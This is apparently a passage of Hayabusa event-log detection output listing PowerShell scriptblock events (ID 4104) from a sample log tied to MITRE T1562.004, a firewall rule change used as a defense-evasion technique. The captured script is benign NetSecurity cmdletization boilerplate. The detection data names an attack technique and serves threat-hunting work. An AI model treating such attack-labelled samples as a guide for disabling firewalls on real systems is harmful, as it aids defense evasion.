$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.Contains",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,Key('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings 
= 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} },rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,Key('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { 
[object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value 
= $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 
'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = 